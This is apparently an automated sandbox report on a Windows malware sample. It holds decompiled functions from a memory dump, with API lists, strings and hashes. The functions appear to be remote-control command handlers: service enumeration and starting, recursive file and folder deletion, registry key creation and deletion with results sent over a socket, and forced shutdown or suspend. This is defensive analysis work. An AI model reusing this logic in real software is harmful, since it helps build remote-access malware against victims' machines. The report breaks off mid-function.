OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID:
API String ID: 2247270020-0
Opcode ID: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
Opcode Fuzzy Hash: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00417754, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417754(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465918; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E004176DE( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E00417754( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x00417768
0x0041776b
0x0041776d
0x0041776f
0x0041776f
0x00417772
0x00417776
0x00417779
0x00417784
0x00417789
0x00417789
0x0041778d
0x00417790
0x00417795
0x004177a0
0x004177a2
0x004177a4
0x004177aa
0x004177ae
0x004177b0
0x004177b0
0x004177b3
0x004177b7
0x004177ba
0x004177c5
0x004177ca
0x004177ca
0x004177ce
0x004177d1
0x004177d6
0x004177db
0x004177f1
0x004177f6
0x0041793e
0x00000000
0x0041793e
0x004177fc
0x004177fe
0x004177fe
0x00417806
0x00417809
0x00417811
0x00417816
0x0041781a
0x0041782a
0x0041792e
0x00417937
0x00417938
0x00000000
0x00417938
0x00417930
0x00417932
0x00000000
0x00417932
0x0041783d
0x004178be
0x004178be
0x00000000
0x004178be
0x0041783f
0x00417847
0x00417849
0x00417849
0x0041784c
0x0041784f
0x0041785a
0x0041785c
0x0041785f
0x0041785f
0x00417863
0x00417866
0x0041786d
0x00417870
0x0041787e
0x0041787e
0x00417880
0x004178e2
0x004178f0
0x004178f0
0x00417905
0x00000000
0x00417907
0x00417909
0x0041790b
0x0041790b
0x00417913
0x00417916
0x0041791e
0x00000000
0x00417923
0x00417905
0x0041788f
0x00000000
0x00000000
0x0041789c
0x004178a4
0x004178a6
0x004178a6
0x004178ae
0x004178b1
0x004178b9
0x00000000
0x004178c1
0x004178c1
0x004178ca
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98

Uniqueness

Uniqueness Score: -1.00%

Function 004163AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004163AD(char _a4) {
				void* _t5;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t1 =  &_a4; // 0x416033
				_t18 = _t5;
				_t17 = OpenServiceW(_t18, L00401EEB(_t1), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				L00401EF0();
				return _t14;
			}

0x004163b5
0x004163b9
0x004163c1
0x004163c4
0x004163d3
0x004163d7
0x004163f4
0x004163f7
0x004163fa
0x004163d9
0x004163da
0x004163da
0x004163ff
0x0041640a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA

Strings

3`A, xrefs: 004163C1, 004163FC

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID: 3`A
API String ID: 276877138-3175782522
Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9

Uniqueness

Uniqueness Score: -1.00%

Function 00411205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479
registrylibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00411205(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = L00401F95( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E004042A6( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E004020EC(_t203, _t351, __edx, _t379, 0x46c238);
				_t352 = _t351 - 0x18;
				E004020EC(_t203, _t352, __edx, _t379,  &_v68);
				E00417478( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					L00401F6D(_t203,  &_v76);
					__eflags = E004021F5( &_v88) - 1;
					if(__eflags > 0) {
						L00409DC9(_t203,  &_v80, L00401F95(L00401E49( &_v88, _t320, __eflags, 1)));
					}
					E004020EC(_t203, _t353 - 0x18, _t320, __eflags, L00401E49( &_v88, _t320, __eflags, 0));
					_t88 = L00401EEB( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00411046(_t217, _t320, _t386);
					L38:
					L00401EF0();
					L39:
					L00401E74( &_v88, _t320);
					E00401FC7();
					E00401FC7();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = L00401F95(L00401E49( &_v88, __edx, __eflags, 2));
					_t101 = L00401F95(L00401E49( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = L00401E49( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E004020EC(_t203, _t356, _t320, __eflags, _t102);
					_t104 = L00410FB5(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = E00410D5C(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00402084(_t203, _t233);
						E00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00402084(_t203, _t233);
					E00404AA4(_t203, 0x46c700, _t320, __eflags);
					E004020EC(_t203, _t358 - 0x18, _t320, __eflags, L00401E49( &_v120, _t320, __eflags, _t330));
					_t113 = L00401F95(L00401E49( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00411046(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, __eflags, 1)));
					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = L00401EEB( &_v84);
					_t121 = L00401E49( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E004020EC(_t203, _t361, _t320, __eflags, _t121);
					_t123 = L00410FB5(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x46bd64(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00402084(_t203, _t247);
						E00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L38;
					}
					_t127 = E00402489();
					_t340 = 2;
					_t203 = E0041184C( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = E0042F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = L00401EEB(E00407309( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						L00401EF0();
						_t137 = L00401E49( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E004020EC(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00411046(_t203, 0, 0);
						E0042F4CF(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = L00401E49( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E004020EC(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00411046(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t146 = E00436769(_t144, L00401F95(L00401E49( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)))));
						_t150 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
						_t152 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = L00401E49( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E004020EC(_t203, _t368, _t320, __eflags, _t153);
						_t155 = L00410FB5(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
						_t320 = _t152;
						_t156 = E00410BF8(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = L00401F95(L00401E49( &_v92, __edx, __eflags, _t328));
							_t160 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
							_t162 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = L00401E49( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E004020EC(_t203, _t370, _t320, __eflags, _t163);
							_t165 = L00410FB5(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = L00410C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							L00401E49( &_v92, __edx, __eflags, _t328);
							_push(E00402489());
							_push(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)));
							_t171 = L00401F95(L00401E49( &_v96, _t320, __eflags, 2));
							_t173 = L00401F95(L00401E49( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = L00401E49( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E004020EC(_t203, _t372, _t320, __eflags, _t174);
							_t176 = L00410FB5(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = E00410B08(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, _t384, 1)));
				_t181 = L00401EEB( &_v84);
				_t182 = L00401E49( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E004020EC(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(L00410FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00402084(_t203, _t247, "6");
				_push(0x72);
				E00404AA4(_t203, 0x46c700, _t320, _t385);
				_t205 = E00407323( &_v108, 0x46c700, 0x46c700);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = E0042F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = L00401EEB(E00407309( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					L00401EF0();
					E004020EC(_t206, _t376 - 0x18, _t326, __eflags, L00401E49( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00411046(_t206, 0, __eflags);
					E0042F4CF(_t206);
					goto L38;
				}
				E004020EC(_t205, _t376 - 0x18, _t320, _t386, L00401E49( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

0x00411205
0x00411205
0x00411211
0x00411214
0x00411219
0x0041121d
0x00411223
0x00411228
0x00411229
0x0041122e
0x00411238
0x0041123d
0x00411247
0x00411250
0x00411255
0x00411258
0x0041125b
0x0041176b
0x00411779
0x0041177c
0x00411795
0x00411795
0x004117ab
0x004117b4
0x004117b9
0x004117bb
0x004117bd
0x004117bd
0x004117c5
0x004117c9
0x004117ce
0x004117d2
0x004117db
0x004117e3
0x004117f0
0x004117f0
0x00411261
0x00411264
0x004116f9
0x0041170c
0x00411711
0x0041171a
0x0041171f
0x00411725
0x0041172a
0x00411732
0x00411736
0x0041173c
0x0041173f
0x00411741
0x00411743
0x0041174f
0x00411754
0x00411754
0x00411760
0x00000000
0x00411760
0x00411745
0x0041154e
0x0041154e
0x0041155a
0x0041156f
0x00411581
0x00411586
0x0041158a
0x00000000
0x0041158f
0x0041126a
0x0041126d
0x004115b8
0x004115d8
0x004115dd
0x004115ea
0x004115ef
0x004115f5
0x004115fa
0x004115ff
0x00411609
0x0041160b
0x004116e0
0x004116e2
0x004113c2
0x004113c2
0x004113ce
0x00000000
0x004113ce
0x00411615
0x0041161c
0x0041162e
0x00411630
0x00411633
0x0041165a
0x00411666
0x0041166e
0x00411683
0x00411688
0x0041168e
0x0041168e
0x00411690
0x00411690
0x00411693
0x00411697
0x00411699
0x00411699
0x004116a2
0x004116ac
0x004116b1
0x004116b7
0x004116bc
0x004116bc
0x004116c0
0x004116c6
0x004116cb
0x004116ce
0x004116d1
0x004116d3
0x00000000
0x004116d3
0x0041163a
0x0041163f
0x00411645
0x0041164a
0x0041164e
0x00411653
0x00000000
0x00411653
0x00411273
0x00411276
0x004113eb
0x004113f5
0x004113f7
0x004114f1
0x004114fc
0x0041150f
0x00411514
0x00411514
0x0041151d
0x00411522
0x00411528
0x0041152d
0x00411532
0x00411535
0x00411539
0x004113fd
0x004113fd
0x00411400
0x00411482
0x00411499
0x004114ac
0x004114b1
0x004114ba
0x004114bf
0x004114c5
0x004114ca
0x004114d2
0x004114d6
0x004114db
0x00411402
0x00411402
0x00411404
0x00411410
0x00411422
0x00411430
0x00411443
0x00411448
0x00411451
0x00411456
0x0041145c
0x00411461
0x00411469
0x0041146d
0x00411472
0x00411472
0x00411400
0x00411540
0x00411543
0x00411545
0x00411547
0x00411597
0x00000000
0x00411549
0x00411549
0x00000000
0x00411549
0x00411547
0x0041127c
0x0041127f
0x00000000
0x00000000
0x0041129c
0x004112b6
0x004112c1
0x004112c6
0x004112cc
0x004112da
0x004112e6
0x004112ec
0x004112ef
0x004112f1
0x004112f3
0x004113bd
0x00000000
0x004113bd
0x004112fe
0x00411303
0x0041130a
0x0041131a
0x0041131c
0x0041131f
0x00411341
0x00411346
0x00411350
0x00411358
0x0041136d
0x00411372
0x00411378
0x00411378
0x0041137a
0x0041137a
0x0041137d
0x00411381
0x00411383
0x00411383
0x0041138c
0x004113a1
0x004113a6
0x004113aa
0x004113b0
0x00000000
0x004113b5
0x00411331
0x00411336
0x00411338
0x00000000

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
GetProcAddress.KERNEL32(00000000), ref: 004115CE

Strings

SHDeleteKeyW, xrefs: 004115BD
Shlwapi.dll, xrefs: 004115C2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
Opcode Fuzzy Hash: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A

Uniqueness

Uniqueness Score: -1.00%

Function 00412BE1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97
libraryloadershutdownCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412BE1(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E00413958();
				L00401E49( &_a16, __edx, _t69, 0);
				_t12 = E00405A6F("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					L00401E49( &_a12, "0", __eflags);
					_t14 = E00405A6F("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						L00401E49( &_a12, "1", __eflags);
						__eflags = E00405A6F("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							L00401E49( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00405A6F("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								L00401E49( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00405A6F("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00436769(_t28, L00401F95(L00401E49( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00436769(_t33, L00401F95(L00401E49( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00436769(_t36, L00401F95(L00401E49( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				_t7 =  &_a16; // 0x404538
				L00401E74(_t7, _t62);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412be1
0x00412be1
0x00412bed
0x00412bf9
0x00412c02
0x00412c03
0x00412c05
0x00412c1d
0x00412c29
0x00412c32
0x00412c33
0x00412c35
0x00412c50
0x00412c61
0x00412c63
0x00412caa
0x00412cac
0x00412cb1
0x00412cb8
0x00412cbd
0x00412cbe
0x00412cc0
0x00412cca
0x00412ccf
0x00412cd6
0x00412cdb
0x00412cdd
0x00412ce3
0x00412ce4
0x00412ce5
0x00000000
0x00412ce5
0x00412cc2
0x00412cc2
0x00412cc3
0x00412ce7
0x00412ce7
0x00412ce7
0x00412c65
0x00412c65
0x00412c7e
0x00412c7e
0x00000000
0x00412c7e
0x00412c37
0x00412c4b
0x00000000
0x00412c4b
0x00412c07
0x00412c16
0x00412c81
0x00412c83
0x00412c83
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

Part of subcall function 00413958: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
Part of subcall function 00413958: OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
Part of subcall function 00413958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
Part of subcall function 00413958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
Part of subcall function 00413958: GetLastError.KERNEL32 ref: 004139A3

ExitWindowsEx.USER32 ref: 00412C83
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00412C98
GetProcAddress.KERNEL32(00000000), ref: 00412C9F

Strings

8E@, xrefs: 004133C4
SetSuspendState, xrefs: 00412C8E
PowrProf.dll, xrefs: 00412C93

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: 8E@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2852448523
Opcode ID: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
Instruction ID: e957077d6b30f4f4fae2d85640c458a1662694f4678ee8a5b01da8d46abf5029
Opcode Fuzzy Hash: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
Instruction Fuzzy Hash: 8621A9706043019BDA04FBF399569AF62499B4434DF10483F7A02BB1E3EF7C8D49865E

Uniqueness

Uniqueness Score: -1.00%

Function 00413958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413958() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
